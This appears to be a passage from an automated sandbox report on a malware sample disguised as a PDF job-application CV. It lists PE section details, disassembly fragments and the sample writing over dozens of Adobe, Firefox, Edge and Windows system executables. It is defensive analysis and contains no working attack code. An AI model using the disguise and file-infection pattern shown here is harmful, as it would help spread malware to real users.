            Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp
            Source: alg.exe.0.dr Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr Static PE information: real checksum: 0x1fb4b should be: 0x15c0e1
            Source: armsvc.exe.0.dr Static PE information: section name: .didat
            Source: alg.exe.0.dr Static PE information: section name: .didat
            Source: plugin-container.exe.1.dr Static PE information: section name: .00cfg
            Source: plugin-container.exe.1.dr Static PE information: section name: .voltbl
            Source: private_browsing.exe.1.dr Static PE information: section name: .00cfg
            Source: private_browsing.exe.1.dr Static PE information: section name: .voltbl
            Source: updater.exe.1.dr Static PE information: section name: .00cfg
            Source: updater.exe.1.dr Static PE information: section name: .voltbl
            Source: updater.exe.1.dr Static PE information: section name: _RDATA
            Source: updater.exe0.1.dr Static PE information: section name: CPADinfo
            Source: updater.exe0.1.dr Static PE information: section name: malloc_h
            Source: elevation_service.exe.1.dr Static PE information: section name: .00cfg
            Source: elevation_service.exe.1.dr Static PE information: section name: .gxfg
            Source: elevation_service.exe.1.dr Static PE information: section name: .retplne
            Source: elevation_service.exe.1.dr Static PE information: section name: _RDATA
            Source: elevation_service.exe.1.dr Static PE information: section name: malloc_h
            Source: maintenanceservice.exe.1.dr Static PE information: section name: .00cfg
            Source: maintenanceservice.exe.1.dr Static PE information: section name: .voltbl
            Source: maintenanceservice.exe.1.dr Static PE information: section name: _RDATA
            Source: msdtc.exe.1.dr Static PE information: section name: .didat
            Source: msiexec.exe.1.dr Static PE information: section name: .didat
            Source: unpack200.exe.1.dr Static PE information: section name: .00cfg
            Source: ie_to_edge_stub.exe.1.dr Static PE information: section name: .00cfg
            Source: ie_to_edge_stub.exe.1.dr Static PE information: section name: .gxfg
            Source: ie_to_edge_stub.exe.1.dr Static PE information: section name: .retplne
            Source: ie_to_edge_stub.exe.1.dr Static PE information: section name: _RDATA
            Source: cookie_exporter.exe.1.dr Static PE information: section name: .00cfg
            Source: cookie_exporter.exe.1.dr Static PE information: section name: .gxfg
            Source: cookie_exporter.exe.1.dr Static PE information: section name: .retplne
            Source: cookie_exporter.exe.1.dr Static PE information: section name: _RDATA
            Source: FXSSVC.exe.1.dr Static PE information: section name: .didat
            Source: identity_helper.exe.1.dr Static PE information: section name: .00cfg
            Source: identity_helper.exe.1.dr Static PE information: section name: .gxfg
            Source: identity_helper.exe.1.dr Static PE information: section name: .retplne
            Source: identity_helper.exe.1.dr Static PE information: section name: _RDATA
            Source: identity_helper.exe.1.dr Static PE information: section name: malloc_h
            Source: elevation_service.exe0.1.dr Static PE information: section name: .gxfg
            Source: elevation_service.exe0.1.dr Static PE information: section name: .retplne
            Source: elevation_service.exe0.1.dr Static PE information: section name: _RDATA
            Source: MsSense.exe.1.dr Static PE information: section name: .didat
            Source: Spectrum.exe.1.dr Static PE information: section name: .didat
            Source: TieringEngineService.exe.1.dr Static PE information: section name: .didat
            Source: vds.exe.1.dr Static PE information: section name: .didat
            Source: VSSVC.exe.1.dr Static PE information: section name: .didat
            Source: setup.exe.1.dr Static PE information: section name: .00cfg
            Source: setup.exe.1.dr Static PE information: section name: .gxfg
            Source: setup.exe.1.dr Static PE information: section name: .retplne
            Source: setup.exe.1.dr Static PE information: section name: LZMADEC
            Source: setup.exe.1.dr Static PE information: section name: _RDATA
            Source: setup.exe.1.dr Static PE information: section name: malloc_h
            Source: msedgewebview2.exe.1.dr Static PE information: section name: .00cfg
            Source: msedgewebview2.exe.1.dr Static PE information: section name: .gxfg
            Source: msedgewebview2.exe.1.dr Static PE information: section name: .retplne
            Source: msedgewebview2.exe.1.dr Static PE information: section name: CPADinfo
            Source: msedgewebview2.exe.1.dr Static PE information: section name: LZMADEC
            Source: msedgewebview2.exe.1.dr Static PE information: section name: _RDATA
            Source: msedgewebview2.exe.1.dr Static PE information: section name: malloc_h
            Source: msedge_proxy.exe.1.dr Static PE information: section name: .00cfg
            Source: msedge_proxy.exe.1.dr Static PE information: section name: .gxfg
            Source: msedge_proxy.exe.1.dr Static PE information: section name: .retplne
            Source: msedge_proxy.exe.1.dr Static PE information: section name: _RDATA
            Source: msedge_proxy.exe.1.dr Static PE information: section name: malloc_h
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: .00cfg
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: .gxfg
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: .retplne
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: LZMADEC
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: _RDATA
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: malloc_h
            Source: notification_click_helper.exe.1.dr Static PE information: section name: .00cfg
            Source: notification_click_helper.exe.1.dr Static PE information: section name: .gxfg
            Source: notification_click_helper.exe.1.dr Static PE information: section name: .retplne
            Source: notification_click_helper.exe.1.dr Static PE information: section name: CPADinfo
            Source: notification_click_helper.exe.1.dr Static PE information: section name: _RDATA
            Source: notification_click_helper.exe.1.dr Static PE information: section name: malloc_h
            Source: pwahelper.exe.1.dr Static PE information: section name: .00cfg
            Source: pwahelper.exe.1.dr Static PE information: section name: .gxfg
            Source: pwahelper.exe.1.dr Static PE information: section name: .retplne
            Source: pwahelper.exe.1.dr Static PE information: section name: _RDATA
            Source: pwahelper.exe.1.dr Static PE information: section name: malloc_h
            Source: msedge_proxy.exe0.1.dr Static PE information: section name: .00cfg
            Source: msedge_proxy.exe0.1.dr Static PE information: section name: .gxfg
            Source: msedge_proxy.exe0.1.dr Static PE information: section name: .retplne
            Source: msedge_proxy.exe0.1.dr Static PE information: section name: _RDATA
            Source: msedge_proxy.exe0.1.dr Static PE information: section name: malloc_h
            Source: pwahelper.exe0.1.dr Static PE information: section name: .00cfg
            Source: pwahelper.exe0.1.dr Static PE information: section name: .gxfg
            Source: pwahelper.exe0.1.dr Static PE information: section name: .retplne
            Source: pwahelper.exe0.1.dr Static PE information: section name: _RDATA
            Source: pwahelper.exe0.1.dr Static PE information: section name: malloc_h
            Source: WmiApSrv.exe.1.dr Static PE information: section name: .didat
            Source: wmpnetwk.exe.1.dr Static PE information: section name: .didat
            Source: SearchIndexer.exe.1.dr Static PE information: section name: .didat
            Source: AppVLP.exe.1.dr Static PE information: section name: .c2r
            Source: OneDriveSetup.exe.1.dr Static PE information: section name: .didat
            Source: AppSharingHookController.exe.1.dr Static PE information: section name: .c2r
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00428945 push ecx; ret 0_2_00428958
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00402F12 push es; retf 0_2_00402F13
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00412119 push eax; iretd 3_2_00412120
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040D9F4 push esp; retf 3_2_0040D9FC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00403450 push eax; ret 3_2_00403452
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040D426 push edx; iretd 3_2_0040D427
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00401D66 pushad ; ret 3_2_00401D6A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041ADD7 push cs; iretd 3_2_0041ADDE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00405F6E push es; retf 3_2_00405F6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00414F26 push esp; ret 3_2_00414F27
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A0225F pushad ; ret 3_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A027FA pushad ; ret 3_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A309AD push ecx; mov dword ptr [esp], ecx 3_2_03A309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A0283D push eax; iretd 3_2_03A02858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A01366 push eax; iretd 3_2_03A01369
            Source: CV_Sales Representative - Job Request PDF.exe Static PE information: section name: .reloc entropy: 7.920482468502862
            Source: AppVClient.exe.0.dr Static PE information: section name: .reloc entropy: 7.9235618227654845
            Source: Aut2exe.exe.1.dr Static PE information: section name: .rsrc entropy: 7.796129962781083
            Source: Aut2exe_x64.exe.1.dr Static PE information: section name: .rsrc entropy: 7.796261129116976
            Source: AutoIt3_x64.exe.1.dr Static PE information: section name: .reloc entropy: 7.9318951505469855
            Source: SciTE.exe.1.dr Static PE information: section name: .reloc entropy: 7.902695414552209
            Source: updater.exe0.1.dr Static PE information: section name: .reloc entropy: 7.870921342277131
            Source: elevation_service.exe.1.dr Static PE information: section name: .reloc entropy: 7.933966591011752
            Source: FXSSVC.exe.1.dr Static PE information: section name: .reloc entropy: 7.930067896898165
            Source: identity_helper.exe.1.dr Static PE information: section name: .reloc entropy: 7.928251921274259
            Source: elevation_service.exe0.1.dr Static PE information: section name: .reloc entropy: 7.932982513156327
            Source: SensorDataService.exe.1.dr Static PE information: section name: .reloc entropy: 7.922528567440854
            Source: Spectrum.exe.1.dr Static PE information: section name: .reloc entropy: 7.933293021524294
            Source: AgentService.exe.1.dr Static PE information: section name: .reloc entropy: 7.924379510937129
            Source: vds.exe.1.dr Static PE information: section name: .reloc entropy: 7.928798198147862
            Source: VSSVC.exe.1.dr Static PE information: section name: .reloc entropy: 7.927155017571518
            Source: setup.exe.1.dr Static PE information: section name: .reloc entropy: 7.932286203155099
            Source: msedgewebview2.exe.1.dr Static PE information: section name: .reloc entropy: 7.923553755278431
            Source: msedge_proxy.exe.1.dr Static PE information: section name: .reloc entropy: 7.929871214304746
            Source: msedge_pwa_launcher.exe.1.dr Static PE information: section name: .reloc entropy: 7.934262006495079
            Source: notification_click_helper.exe.1.dr Static PE information: section name: .reloc entropy: 7.931778469311022
            Source: pwahelper.exe.1.dr Static PE information: section name: .reloc entropy: 7.928413847878667
            Source: msedge_proxy.exe0.1.dr Static PE information: section name: .reloc entropy: 7.929866883559881
            Source: pwahelper.exe0.1.dr Static PE information: section name: .reloc entropy: 7.928415240795317
            Source: wbengine.exe.1.dr Static PE information: section name: .reloc entropy: 7.9290214501884195
            Source: wmpnetwk.exe.1.dr Static PE information: section name: .reloc entropy: 7.934810669423257
            Source: SearchIndexer.exe.1.dr Static PE information: section name: .reloc entropy: 7.933782405445589
            Source: 7zFM.exe.1.dr Static PE information: section name: .reloc entropy: 7.919203766013738
            Source: 7zG.exe.1.dr Static PE information: section name: .reloc entropy: 7.914539216942372
            Source: OneDriveSetup.exe.1.dr Static PE information: section name: .reloc entropy: 7.85914217778932
            Source: Integrator.exe.1.dr Static PE information: section name: .reloc entropy: 7.75701428167723

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\wbem\WmiApSrv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\vds.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, System file written: C:\Windows\System32\alg.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\7-Zip\7zFM.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\snmptrap.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\Spectrum.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\Locator.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\7-Zip\7z.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, System file written: C:\Windows\System32\AppVClient.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\SysWOW64\perfhost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\7-Zip\7zG.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\msiexec.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\VSSVC.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\wbengine.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\SearchIndexer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\TieringEngineService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\firefox.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\updater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\AgentService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\7-Zip\Uninstall.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\FXSSVC.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, System file written: C:\Windows\System32\sppsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\SensorDataService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Windows\System32\msdtc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
